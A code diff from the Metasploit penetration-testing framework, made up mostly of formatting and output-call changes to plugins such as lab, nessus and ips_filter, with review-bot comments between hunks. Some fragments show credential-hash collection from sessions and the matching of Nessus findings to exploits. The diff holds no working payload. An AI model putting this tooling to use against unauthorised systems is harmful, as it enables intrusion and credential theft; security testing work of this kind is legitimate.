+++ b/modules/post/windows/manage/autoroute.rb @@ -101,14 +101,12 @@ class Metasploit3 < Msf::Post 'Header' => "Active Routing Table", 'Prefix' => "\n", 'Postfix' => "\n", - 'Columns' => - [ + 'Columns' => [ 'Subnet', 'Netmask', 'Gateway', ], - 'ColProps' => - { + 'ColProps' => { 'Subnet' => { 'MaxWidth' => 17 }, 'Netmask' => { 'MaxWidth' => 17 }, }) diff --git a/modules/post/windows/manage/delete_user.rb b/modules/post/windows/manage/delete_user.rb index b357d59f0d..8df6b6bb1d 100644 --- a/modules/post/windows/manage/delete_user.rb +++ b/modules/post/windows/manage/delete_user.rb @@ -19,8 +19,10 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Local User Account Deletion', - 'Description' => %q{ This module deletes a local user account from the specified server, - or the local machine if no server is given.}, + 'Description' => %q{ + This module deletes a local user account from the specified server, + or the local machine if no server is given. + }, 'License' => MSF_LICENSE, 'Author' => [ 'chao-mu'], 'Version' => '$Revision$', diff --git a/plugins/db_credcollect.rb b/plugins/db_credcollect.rb index fdff784218..6c23c5e613 100644 --- a/plugins/db_credcollect.rb +++ b/plugins/db_credcollect.rb @@ -57,8 +57,8 @@ class Plugin::CredCollect < Msf::Plugin # Target infos for the db record addr = session.sock.peerhost # This ought to read from the exploit's datastore. - # Use the meterpreter script if you need to control it. - smb_port = 445 + # Use the meterpreter script if you need to control it. + smb_port = 445 # Record hashes to the running db instance hashes.each do |hash| diff --git a/plugins/ips_filter.rb b/plugins/ips_filter.rb index 7b4035bd46..5efa06e46c 100644 --- a/plugins/ips_filter.rb +++ b/plugins/ips_filter.rb 
@@ -68,7 +68,7 @@ module SocketTracer # Hook the write method def write(buf, opts = {}) if (ips_match(buf)) - $stderr.puts "*** Outbound write blocked due to possible signature match" + print_error "Outbound write blocked due to possible signature match" return 0 end super(buf, opts) @@ -78,7 +78,7 @@ module SocketTracer def read(length = nil, opts = {}) r = super(length, opts) if (ips_match(r)) - $stderr.puts "*** Incoming read may match a known signature" + print_error "Incoming read may match a known signature" end return r end @@ -95,11 +95,11 @@ module SocketTracer begin r = Regexp.new(s[1]) if (data.match(r)) - $stderr.puts "*** Matched IPS signature #{s[0]}" + print_error "Matched IPS signature #{s[0]}" return true end rescue ::Exception => e - $stderr.puts "*** Compiled error: #{s[1]}" + print_error "Compiled error: #{s[1]}" end end diff --git a/plugins/lab.rb b/plugins/lab.rb index 6c5054ed7d..60e3f8b7ed 100644 --- a/plugins/lab.rb +++ b/plugins/lab.rb @@ -1,5 +1,6 @@ ## -## $Id$ +# $Id$ +# $Revision$ ## $:.unshift(File.join(File.expand_path(File.dirname(__FILE__)), '..', 'lib', 'lab')) @@ -14,7 +15,7 @@ class Plugin::Lab < Msf::Plugin include Msf::Ui::Console::CommandDispatcher attr_accessor :controller - + def initialize(driver) super(driver) @controller = nil 
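Review bot: The rescue branch's new `print_error "Compiled error: #{s[1]}"` in `ips_match` drops the exception bound as `e`, so a signature that fails to compile is reported without the reason; `print_error "Failed to compile IPS signature #{s[0]} (#{s[1]}): #{e.message}"` would name both the rule and the error. The surrounding `rescue ::Exception => e` also catches far more than a bad pattern (SystemExit and Interrupt included), and `rescue RegexpError, TypeError => e` is the narrower choice for a `Regexp.new` call, even though the commit only touches the message line. Whether `print_error` is in scope for the `SocketTracer` mixin depends on what it is mixed into, which is not visible here, whereas the replaced `$stderr.puts` had no such dependency. `ips_match` begins outside the hunk.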
@@ -28,12 +29,12 @@ class Plugin::Lab < Msf::Plugin "lab_help" => "lab_help - Show that command's description.", "lab_show" => "lab_show - show all vms in the lab.", "lab_show_running" => "lab_show_running - show running vms.", - "lab_load" => "lab_load [file] - load a lab definition from disk.", + "lab_load" => "lab_load [file] - load a lab definition from disk.", "lab_save" => "lab_save [filename] - persist a lab definition in a file.", - "lab_load_running" => "lab_load_running [type] [user] [host] - use the running vms to create a lab.", - "lab_load_config" => "lab_load_config [type] [user] [host] - use the vms in the config to create a lab.", + "lab_load_running" => "lab_load_running [type] [user] [host] - use the running vms to create a lab.", + "lab_load_config" => "lab_load_config [type] [user] [host] - use the vms in the config to create a lab.", "lab_load_dir" => "lab_load_dir [type] [directory] - create a lab from a specified directory.", - "lab_clear" => "lab_clear - clear the running lab.", + "lab_clear" => "lab_clear - clear the running lab.", "lab_start" => "lab_start [vmid+|all] start the specified vm.", "lab_reset" => "lab_reset [vmid+|all] reset the specified vm.", "lab_suspend" => "lab_suspend [vmid+|all] suspend the specified vm.", 
@@ -48,60 +49,60 @@ class Plugin::Lab < Msf::Plugin def name "Lab" end - + ## ## Regular Lab Commands - ## + ## def cmd_lab_load(*args) - return lab_usage unless args.count == 1 + return lab_usage unless args.count == 1 @controller.from_file(args[0]) end def cmd_lab_load_running(*args) return lab_usage if args.empty? - + if args[0] =~ /^remote_/ - return lab_usage unless args.count == 3 + return lab_usage unless args.count == 3 ## Expect a username & password @controller.build_from_running(args[0], args[1], args[2]) else - return lab_usage unless args.count == 1 + return lab_usage unless args.count == 1 @controller.build_from_running(args[0]) end end def cmd_lab_load_config(*args) return lab_usage if args.empty? - + if args[0] =~ /^remote_/ - return lab_usage unless args.count == 3 + return lab_usage unless args.count == 3 ## Expect a username & password @controller.build_from_config(args[0], args[1], args[2]) else - return lab_usage unless args.count == 1 + return lab_usage unless args.count == 1 @controller.build_from_config(args[0]) end end - def cmd_lab_load_dir(*args) + def cmd_lab_load_dir(*args) return lab_usage unless args.count == 2 @controller.build_from_dir(args[0],args[1],true) end def cmd_lab_clear(*args) @controller.clear! - end + end - def cmd_lab_save(*args) + def cmd_lab_save(*args) return lab_usage if args.empty? @controller.to_file(args[0]) end - - ## + + ## ## Commands for dealing with a currently-loaded lab - ## + ## def cmd_lab_show(*args) if args.empty? 
@@ -112,72 +113,72 @@ class Plugin::Lab < Msf::Plugin print_line @controller[vmid].to_yaml else print_error "Unknown vm '#{vmid}'" - end - end - end - end - - def cmd_lab_show_running(*args) - hlp_print_lab_running - end - - def cmd_lab_start(*args) - return lab_usage if args.empty? - - if args[0] == "all" - @controller.each do |vm| - print_line "Starting lab vm #{vm.vmid}." - if !vm.running? - vm.start - else - print_line "Lab vm #{vm.vmid} already running." end end - else - args.each do |arg| - if @controller.includes_vmid? arg - vm = @controller.find_by_vmid(arg) - if !vm.running? - print_line "Starting lab vm #{vm.vmid}." - vm.start - else - print_line "Lab vm #{vm.vmid} already running." - end - end - end end end - - def cmd_lab_stop(*args) + + def cmd_lab_show_running(*args) + hlp_print_lab_running + end + + def cmd_lab_start(*args) return lab_usage if args.empty? - + if args[0] == "all" - @controller.each do |vm| - print_line "Stopping lab vm #{vm.vmid}." - if vm.running? - vm.stop + @controller.each do |vm| + print_line "Starting lab vm #{vm.vmid}." + if !vm.running? + vm.start else - print_line "Lab vm #{vm.vmid} not running." + print_line "Lab vm #{vm.vmid} already running." end end else args.each do |arg| if @controller.includes_vmid? arg - vm = @controller.find_by_vmid(arg) - if vm.running? - print_line "Stopping lab vm #{vm.vmid}." - vm.stop + vm = @controller.find_by_vmid(arg) + if !vm.running? + print_line "Starting lab vm #{vm.vmid}." + vm.start else - print_line "Lab vm #{vm.vmid} not running." + print_line "Lab vm #{vm.vmid} already running." end - end + end end end - end + end + + def cmd_lab_stop(*args) + return lab_usage if args.empty? + + if args[0] == "all" + @controller.each do |vm| + print_line "Stopping lab vm #{vm.vmid}." + if vm.running? + vm.stop + else + print_line "Lab vm #{vm.vmid} not running." + end + end + else + args.each do |arg| + if @controller.includes_vmid? arg + vm = @controller.find_by_vmid(arg) + if vm.running? 
+ print_line "Stopping lab vm #{vm.vmid}." + vm.stop + else + print_line "Lab vm #{vm.vmid} not running." + end + end + end + end + end def cmd_lab_suspend(*args) return lab_usage if args.empty? - + if args[0] == "all" @controller.each{ |vm| vm.suspend } else @@ -186,15 +187,15 @@ class Plugin::Lab < Msf::Plugin if @controller.find_by_vmid(arg).running? print_line "Suspending lab vm #{arg}." @controller.find_by_vmid(arg).suspend - end - end + end + end end end - end + end def cmd_lab_reset(*args) return lab_usage if args.empty? - + if args[0] == "all" print_line "Resetting all lab vms." @controller.each{ |vm| vm.reset } @@ -203,18 +204,18 @@ class Plugin::Lab < Msf::Plugin if @controller.includes_vmid? arg if @controller.find_by_vmid(arg).running? print_line "Resetting lab vm #{arg}." - @controller.find_by_vmid(arg).reset + @controller.find_by_vmid(arg).reset end - end + end end end - end + end def cmd_lab_snapshot(*args) return lab_usage if args.count < 2 - snapshot = args[args.count-1] - + snapshot = args[args.count-1] + if args[0] == "all" print_line "Snapshotting all lab vms to snapshot: #{snapshot}." @controller.each{ |vm| vm.create_snapshot(snapshot) } @@ -225,12 +226,12 @@ class Plugin::Lab < Msf::Plugin @controller[vmid_arg].create_snapshot(snapshot) end end - end + end def cmd_lab_revert(*args) return lab_usage if args.count < 2 - snapshot = args[args.count-1] + snapshot = args[args.count-1] if args[0] == "all" print_line "Reverting all lab vms to snapshot: #{snapshot}." @@ -239,10 +240,10 @@ class Plugin::Lab < Msf::Plugin args[0..-2].each do |vmid_arg| next unless @controller.includes_vmid? vmid_arg print_line "Reverting #{vmid_arg} to snapshot: #{snapshot}." - @controller[vmid_arg].revert_snapshot(snapshot) + @controller[vmid_arg].revert_snapshot(snapshot) end end - end + end def cmd_lab_run_command(*args) 
@@ -250,7 +251,7 @@ class Plugin::Lab < Msf::Plugin command = args[args.count-1] if args[0] == "all" print_line "Running command #{command} on all vms." - @controller.each do |vm| + @controller.each do |vm| if vm.running? print_line "#{vm.vmid} running command: #{command}." vm.run_command(command) @@ -260,19 +261,19 @@ class Plugin::Lab < Msf::Plugin args[0..-2].each do |vmid_arg| next unless @controller.includes_vmid? vmid_arg if @controller[vmid_arg].running? - print_line "#{vmid_arg} running command: #{command}." + print_line "#{vmid_arg} running command: #{command}." @controller[vmid_arg].run_command(command) end end end - end + end def cmd_lab_browse_to(*args) return lab_usage if args.empty? uri = args[args.count-1] if args[0] == "all" print_line "Opening: #{uri} on all vms." - @controller.each do |vm| + @controller.each do |vm| if vm.running? print_line "#{vm.vmid} opening to uri: #{uri}." vm.open_uri(uri) @@ -288,12 +289,12 @@ class Plugin::Lab < Msf::Plugin end end end - + ## ## Commands for help ## - + def longest_cmd_size commands.keys.map {|x| x.size}.sort.last end @@ -332,9 +333,9 @@ class Plugin::Lab < Msf::Plugin end end - print_line + print_line print_line "In order to use this plugin, you'll want to configure a .yml lab file" - print_line "You can find an example in data/lab/test_targets.yml" + print_line "You can find an example in data/lab/test_targets.yml" print_line end @@ -349,18 +350,18 @@ class Plugin::Lab < Msf::Plugin 'Columns' => [ 'Vmid', 'Name', 'Location', "Power?" ] ) - @controller.each do |vm| + @controller.each do |vm| tbl << [ vm.vmid, vm.name, vm.location, vm.running?] end - + print_line tbl.to_s end - + def hlp_print_lab_running - indent = ' ' + indent = ' ' tbl = Rex::Ui::Text::Table.new( 'Header' => 'Running Lab VMs', 
@@ -369,19 +370,19 @@ class Plugin::Lab < Msf::Plugin ) @controller.each do |vm| - if vm.running? - tbl << [ vm.vmid, + if vm.running? + tbl << [ vm.vmid, vm.name, vm.location, vm.running?] - end + end end print_line tbl.to_s end end - + # # The constructor is called when an instance of the plugin is created. The # framework instance that the plugin is being associated with is passed in @@ -427,6 +428,6 @@ class Plugin::Lab < Msf::Plugin def desc "Adds the ability to manage VMs" end - + end ## End Class end ## End Module diff --git a/plugins/msfd.rb b/plugins/msfd.rb index 3eadba8cdc..98b13ce1c5 100644 --- a/plugins/msfd.rb +++ b/plugins/msfd.rb @@ -104,13 +104,13 @@ class Plugin::Msfd < Msf::Plugin addr = Rex::Socket.resolv_nbo(client.peerhost) if opts['HostsAllowed'] and - not opts['HostsAllowed'].find { |x| x == addr } + not opts['HostsAllowed'].find { |x| x == addr } client.close next end if opts['HostsDenied'] and - opts['HostsDenied'].find { |x| x == addr } + opts['HostsDenied'].find { |x| x == addr } client.close next end diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 62cf968746..a5a8d1cf2f 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -1,16 +1,18 @@ +# $Id$ +# $Revision$ require 'nessus/nessus-xmlrpc' require 'rex/parser/nessus_xml' module Msf - + #constants NBVer = "1.1" # Nessus Plugin Version. Increments each time we commit to msf Xindex = "#{Msf::Config.get_config_root}/nessus_index" # location of the exploit index file used to speed up searching for valid exploits. Nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml" #location of the nessus.yml containing saved nessus creds - + class Plugin::Nessus < Msf::Plugin - + #creates the index of exploit details to make searching for exploits much faster. def create_xindex start = Time.now 
@@ -19,50 +21,50 @@ module Msf count = 0 # use Msf::Config.get_config_root as the location. File.open("#{Xindex}", "w+") do |f| - #need to add version line. - f.puts(Msf::Framework::RepoRevision) - framework.exploits.sort.each { |refname, mod| - case count - when 0 - print("\b\b\b[|]") - count += 1 - when 1 - print("\b\b\b[/]") - count += 1 - when 2 - print("\b\b\b[-]") - count += 1 - when 3 - print("\b\b\b[\\]") - count =0 - end - stuff = "" - o = nil - begin - o = mod.new - rescue ::Exception - end - stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}" - next if not o - o.references.map do |x| - if !(x.ctx_id == "URL") - if (x.ctx_id == "MSB") - stuff << "|#{x.ctx_val}" - else - stuff << "|#{x.ctx_id}-#{x.ctx_val}" + #need to add version line. + f.puts(Msf::Framework::RepoRevision) + framework.exploits.sort.each { |refname, mod| + case count + when 0 + print("\b\b\b[|]") + count += 1 + when 1 + print("\b\b\b[/]") + count += 1 + when 2 + print("\b\b\b[-]") + count += 1 + when 3 + print("\b\b\b[\\]") + count =0 + end + stuff = "" + o = nil + begin + o = mod.new + rescue ::Exception + end + stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}" + next if not o + o.references.map do |x| + if !(x.ctx_id == "URL") + if (x.ctx_id == "MSB") + stuff << "|#{x.ctx_val}" + else + stuff << "|#{x.ctx_id}-#{x.ctx_val}" + end end end - end - stuff << "\n" - f.puts(stuff) - } + stuff << "\n" + f.puts(stuff) + } end total = Time.now - start print("\b\b\b[*]%clr") print("\n") print_status("It has taken : #{total} seconds to build the exploits search index") end - + def nessus_index if File.exist?("#{Xindex}") #check if it's version line matches current version. @@ -79,7 +81,7 @@ module Msf create_xindex end end - + class ConsoleCommandDispatcher include Msf::Ui::Console::CommandDispatcher def name 
@@ -126,11 +128,11 @@ module Msf "nessus_report_exploits" => "Shows a summary of all the vulns in a scan that have a msf exploit." } end - + def cmd_nessus_index Msf::Plugin::Nessus.nessus_index end - + def cmd_nessus_save(*args) #if we are logged in, save session details to nessus.yaml if args[0] == "-h" @@ -138,15 +140,15 @@ module Msf print_status(" nessus_save") return end - + if args[0] print_status("Usage: ") print_status(" nessus_save") return end - + group = "default" - + if ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) config = Hash.new config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port}} @@ -154,15 +156,15 @@ module Msf f.puts YAML.dump(config) end print_good("#{Nessus_yaml} created.") - + else print_error("Missing username/password/server/port - relogin and then try again.") return end end - + def cmd_nessus_report_exploits(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_summary ") @@ -172,20 +174,20 @@ module Msf print_status("%redThis plugin is experimental%clr") return end - + if ! nessus_verify_db print_error("You need a database configured for this command.") print_error("Connect to a db with \"db_connect\"") print_error("Then import scan with nessus_report_get") return end - + if ! nessus_verify_token return end - + rid = nil - + case args.length when 1 rid = args[0] @@ -195,12 +197,12 @@ module Msf print_status("Parses your report and just shows you exploitable vulns.") return end - + if check_scan(rid) print_error("That scan is still running.") return end - + #streaming parser ftw. content = nil content=@n.report_file_download(rid) 
@@ -215,20 +217,20 @@ module Msf parser.on_found_host = Proc.new { |host| addr = host['addr'] || host['hname'] addr.gsub!(/[\n\r]/," or ") if addr - + os = host['os'] os.gsub!(/[\n\r]/," or ") if os - + hname = host['hname'] hname.gsub!(/[\n\r]/," or ") if hname - + mac = host['mac'] mac.gsub!(/[\n\r]/," or ") if mac - + host['ports'].each do |item| - + next if item['port'] == 0 - + exp = [] msf = nil nasl = item['nasl'].to_s @@ -237,21 +239,21 @@ module Msf name = item['svc_name'] severity = item['severity'] description = item['description'] - cve = item['cve'] + cve = item['cve'] bid = item['bid'] xref = item['xref'] msf = item['msf'] - + # find exploits based on the msf plugin name from the report output. if msf regex = Regexp.new(msf, true, 'n') File.open("#{Xindex}", "r") do |m| while line = m.gets exp.push line.split("|").first if (line.match(regex)) - end + end end end - + # find exploits based on CVE if cve cve.each do |c| @@ -259,11 +261,11 @@ module Msf File.open("#{Xindex}", "r") do |m| while line = m.gets exp.push line.split("|").first if (line.match(regex)) - end + end end end end - + #find exploits based on BID if bid bid.each do |c| @@ -273,13 +275,13 @@ module Msf File.open("#{Xindex}", "r") do |m| while line = m.gets exp.push line.split("|").first if (line.match(regex)) - end + end end end end - + #find exploits based on OSVDB entry - + #find exploits based on MSB if xref xref.each do |c| @@ -289,12 +291,12 @@ module Msf File.open("#{Xindex}", "r") do |m| while line = m.gets exp.push line.split("|").first if (line.match(regex)) - end + end end end end end - + nss = 'NSS-' + nasl next if exp.empty? print("#{addr} | #{os} | #{port} | #{nss} | Sev #{severity} | %bld%red#{exp.uniq}%clr\n") @@ -313,11 +315,11 @@ module Msf print_status("use nessus_policy_list to list all available policies") return end - + if ! nessus_verify_token return end - + case args.length when 2 pid = args[0].to_i 
@@ -328,30 +330,30 @@ module Msf print_status(" use nessus_policy_list to list all available policies") return end - + if check_policy(pid) print_error("That policy does not exist.") return end - + tgts = "" framework.db.hosts(framework.db.workspace).each do |host| tgts << host.address tgts << "," end - + tgts.chop! - + print_status("Creating scan from policy number #{pid}, called \"#{name}\" and scanning all hosts in workspace") - + scan = @n.scan_new(pid, name, tgts) - + if scan print_status("Scan started. uid is #{scan}") end - + end - + def cmd_nessus_logout @token = nil print_status("Logged out") @@ -359,14 +361,14 @@ module Msf print_good("#{Nessus_yaml} removed.") return end - + def cmd_nessus_help(*args) tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Command', 'Help Text' - ]) + ] + ) tbl << [ "Generic Commands", "" ] tbl << [ "-----------------", "-----------------"] tbl << [ "nessus_connect", "Connect to a nessus server" ] @@ -415,12 +417,13 @@ module Msf tbl << [ "-----------------", "-----------------"] tbl << [ "nessus_policy_list", "List all polciies" ] tbl << [ "nessus_policy_del", "Delete a policy" ] - puts "\n" - puts tbl.to_s + "\n" + print_status "" + print_status tbl.to_s + print_status "" end - + def cmd_nessus_server_feed(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_server_feed") @@ -429,23 +432,22 @@ module Msf print_status("Returns information about the feed type and server version.") return end - + if nessus_verify_token @feed, @version, @web_version = @n.feed tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Feed', 'Nessus Version', 'Nessus Web Version' ]) tbl << [@feed, @version, @web_version] print_good("Nessus Status") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end end - + def nessus_verify_token if @token.nil? or @token == '' ncusage 
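Review bot: `print_status tbl.to_s` in `cmd_nessus_help` passes a multi-line table through a method that, as far as I can tell, prefixes its argument once with `[*] ` and terminates the line, so only the table's first row gets the prefix and `print_status ""` emits a bare `[*] ` line; `print_line tbl.to_s` with `print_line` for the blank lines keeps the table aligned. The `print_good "\n"` / `print_good tbl.to_s + "\n"` replacement in `cmd_nessus_server_feed` in this hunk has the same problem, and `print_good` already ends its line so the explicit `"\n"` doubles the blank lines. The identical replacements in `cmd_nessus_report_list` and `cmd_nessus_scan_status` later in the diff should be fixed the same way. Both methods in this hunk are cut by the hunk boundaries.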
@@ -453,16 +455,16 @@ module Msf end true end - + def nessus_verify_db - + if ! (framework.db and framework.db.active) print_error("No database has been configured, please use db_create/db_connect first") return false end true end - + def ncusage print_status("%redYou must do this before any other commands.%clr") print_status("Usage: ") @@ -480,9 +482,9 @@ module Msf print_status("This only works after you have saved creds with nessus_save") return end - + def cmd_nessus_connect(*args) - + if ! args[0] if File.exist?("#{Nessus_yaml}") lconfig = YAML.load_file("#{Nessus_yaml}") @@ -497,7 +499,7 @@ module Msf return end end - + if args[0] == "-h" print_status("%redYou must do this before any other commands.%clr") print_status("Usage: ") @@ -521,19 +523,19 @@ module Msf print_status("know that nessus used a self signed cert and the risk that presents.") return end - + if ! @token == '' print_error("You are already authenticated. Call nessus_logout before authing again") return end - + if(args.length == 0 or args[0].empty?) ncusage return end - + @user = @pass = @host = @port = @sslv = nil - + case args.length when 1,2 if args[0].include? "@" @@ -548,7 +550,7 @@ module Msf @port ||= '8834' @sslv = args[1] end - + when 3,4,5 ncusage return @@ -556,12 +558,12 @@ module Msf ncusage return end - + if /\/\//.match(@host) ncusage return end - + if(@host != "localhost" and @host != "127.0.0.1" and @sslv != "ok") print_error("Warning: SSL connections are not verified in this release, it is possible for an attacker") print_error(" with the ability to man-in-the-middle the Nessus traffic to capture the Nessus") 
@@ -569,36 +571,34 @@ module Msf print_error(" as an additional parameter to this command.") return end - + if ! @user print_good("Username:") - $stdout.flush @user = gets @user.chomp! end - + if ! @pass print_good("Password:") - $stdout.flush @pass = gets @pass.chomp! end - + if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) ncusage return end nessus_login end - + def nessus_login - + if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) print_status("You need to connect to a server first.") ncusage return end - + @url = "https://#{@host}:#{@port}/" print_status("Connecting to #{@url} as #{@user}") @n=NessusXMLRPC::NessusXMLRPC.new(@url,@user,@pass) @@ -610,9 +610,9 @@ module Msf return end end - + def cmd_nessus_report_list(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_list") @@ -621,35 +621,34 @@ module Msf print_status("Generates a list of all reports visable to your user.") return end - + if ! nessus_verify_token return end - + list=@n.report_list_hash - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'ID', 'Name', 'Status', 'Date' ]) - + list.each {|report| t = Time.at(report['timestamp'].to_i) tbl << [ report['id'], report['name'], report['status'], t.strftime("%H:%M %b %d %Y") ] } print_good("Nessus Report List") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" print_status("You can:") print_status(" Get a list of hosts from the report: nessus_report_hosts ") end - + def check_scan(*args) - + case args.length when 1 rid = args[0] @@ -657,7 +656,7 @@ module Msf print_error("No Report ID Supplied") return end - + scans = @n.scan_list_hash scans.each {|scan| if scan['id'] == rid 
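Review bot: With `$stdout.flush` gone, the interactive fallback in `cmd_nessus_connect` still reads credentials with a bare `gets` followed by `chomp!`, which raises NoMethodError when stdin is at EOF (a resource script or piped console); `@user = (gets || '').chomp` and the same for `@pass` keep the empty-field check below reachable. The password is read with terminal echo on, so it lands in the console scrollback; that predates the commit but deserves a `# TODO: read the password without echo` comment next to the prompt. Whether the `print_good` prompt appears before `gets` blocks now depends on the console driver flushing its output, which is not visible here. `cmd_nessus_connect` begins outside the hunk.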
@@ -666,9 +665,9 @@ module Msf } return false end - + def cmd_nessus_report_get(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_get ") @@ -680,24 +679,24 @@ module Msf print_status("Use: nessus_report_list to obtain a list of report id's") return end - + if ! nessus_verify_token return end - + if ! nessus_verify_db return end - + if(args.length == 0 or args[0].empty? or args[0] == "-h") print_status("Usage: ") print_status(" nessus_report_get ") print_status(" use nessus_report_list to list all available reports for importing") return end - + rid = nil - + case args.length when 1 rid = args[0] @@ -707,7 +706,7 @@ module Msf print_status(" use nessus_report_list to list all available reports for importing") return end - + if check_scan(rid) print_error("That scan is still running.") return @@ -720,41 +719,38 @@ module Msf end print_status("importing " + rid) framework.db.import({:data => content}) do |type,data| - case type + case type when :address @count = 0 - print("%bld%blu[*]%clr %bld#{data}%clr") - $stdout.flush + print_line("%bld%blu[*]%clr %bld#{data}%clr") when :port - print("\b") + print_line("\b") case @count when 0 - print("%bld%grn|") + print_line("%bld%grn|") @count += 1 when 1 - print("%bld%grn/") + print_line("%bld%grn/") @count += 1 when 2 - print("%bld%grn-") + print_line("%bld%grn-") @count += 1 when 3 - print("%bld%grn/") + print_line("%bld%grn/") @count = 0 end - $stdout.flush when :end - print("\b Done!%clr\n") - $stdout.flush - when :os + print_line("\b Done!%clr\n") + when :os data.gsub!(/[\n\r]/," or ") if data - print(" #{data} ") - end + print_line(" #{data} ") + end end print_good("Done") end - + def cmd_nessus_scan_status(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_status") 
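Review bot: Turning the spinner's `print("\b")`, `print("%bld%grn|")` etc. into `print_line(...)` in cmd_nessus_report_get breaks the in-place progress indicator: each call now terminates its own line, so every `:port` event emits a line holding a lone backspace or a single colour-coded glyph, and `print_line("\b Done!%clr\n")` ends with a double newline. Either keep `print(...)` for the spinner branches and only the `:end` branch as `print_line(" Done!%clr")`, or drop the spinner and emit one `print_status(data)` per `:address`. If `print` does not flush through the driver's output, the removed `$stdout.flush` was what made the glyphs visible promptly, so that should be checked too. The method starts outside this hunk.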
@@ -763,11 +759,11 @@ module Msf print_status("Returns a list of information about currently running scans.") return end - + if ! nessus_verify_token return end - + list=@n.scan_list_hash if list.empty? print_status("No Scans Running.") @@ -776,10 +772,9 @@ module Msf print_status(" Create a scan: nessus_scan_new ") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Scan ID', 'Name', 'Owner', @@ -788,22 +783,22 @@ module Msf 'Current Hosts', 'Total Hosts' ]) - + list.each {|scan| t = Time.at(scan['start'].to_i) tbl << [ scan['id'], scan['name'], scan['owner'], t.strftime("%H:%M %b %d %Y"), scan['status'], scan['current'], scan['total'] ] } print_good("Running Scans") - puts "\n" - puts tbl.to_s + "\n" - puts "\n" + print_good "\n" + print_good tbl.to_s + "\n" + print_good "\n" print_status("You can:") print_good(" Import Nessus report to database : nessus_report_get ") print_good(" Pause a nessus scan : nessus_scan_pause ") end - + def cmd_nessus_template_list(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_template_list") @@ -812,13 +807,13 @@ module Msf print_status("Returns a list of information about the server templates..") return end - + if ! nessus_verify_token return end - + list=@n.template_list_hash - + if list.empty? print_status("No Templates Created.") print_status("You can:") 
@@ -826,30 +821,29 @@ module Msf print_status(" Create a template: nessus_template_new ") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Template ID', 'Policy ID', 'Name', 'Owner', 'Target' ]) - + list.each {|template| tbl << [ template['name'], template['pid'], template['rname'], template['owner'], template['target'] ] } print_good("Templates") - puts "\n" - puts tbl.to_s + "\n" - puts "\n" + print_good "\n" + print_good tbl.to_s + "\n" + print_good "\n" print_status("You can:") print_good(" Import Nessus report to database : nessus_report_get ") end - + def cmd_nessus_user_list(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_user_list") @@ -858,36 +852,35 @@ module Msf print_status("Returns a list of the users on the Nessus server and their access level.") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_status("Your Nessus user is not an admin") end - + list=@n.users_list print_good("There are #{list.length} users") tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Name', 'Is Admin?', 'Last Login' ]) - + list.each {|user| t = Time.at(user['lastlogin'].to_i) tbl << [ user['name'], user['admin'], t.strftime("%H:%M %b %d %Y") ] } print_good("Nessus users") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end - + def cmd_nessus_server_status(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_server_status") @@ -900,19 +893,18 @@ module Msf if ! nessus_verify_token return end - + #Check if we are an admin if ! @n.is_admin print_status("You need to be an admin for this.") return end - + #Versions cmd_nessus_server_feed - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Users', 'Policies', 'Running Scans', 
@@ -922,19 +914,19 @@ module Msf #Count how many users the server has. list=@n.users_list users = list.length - + #Count how many policies list=@n.policy_list_hash policies = list.length - + #Count how many running scans list=@n.scan_list_uids scans = list.length - + #Count how many reports are available list=@n.report_list_hash reports = list.length - + #Count how many plugins list=@n.plugins_list total = Array.new @@ -943,12 +935,12 @@ module Msf } plugins = total.sum tbl << [users, policies, scans, reports, plugins] - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end - + def cmd_nessus_plugin_list(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_plugin_list") @@ -957,14 +949,13 @@ module Msf print_status("Returns a list of the plugins on the server per family.") return end - + if ! nessus_verify_token return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Family Name', 'Total Plugins' ]) @@ -978,13 +969,13 @@ module Msf tbl << [ '', ''] tbl << [ 'Total Plugins', plugins ] print_good("Plugins By Family") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" print_status("List plugins for a family : nessus_plugin_family ") end - + def check_policy(*args) - + case args.length when 1 pid = args[0] @@ -992,7 +983,7 @@ module Msf print_error("No Policy ID supplied.") return end - + pol = @n.policy_list_hash pol.each {|p| if p['id'].to_i == pid @@ -1001,9 +992,9 @@ module Msf } return true end - + def cmd_nessus_scan_new(*args) - + if args[0] == "-h" 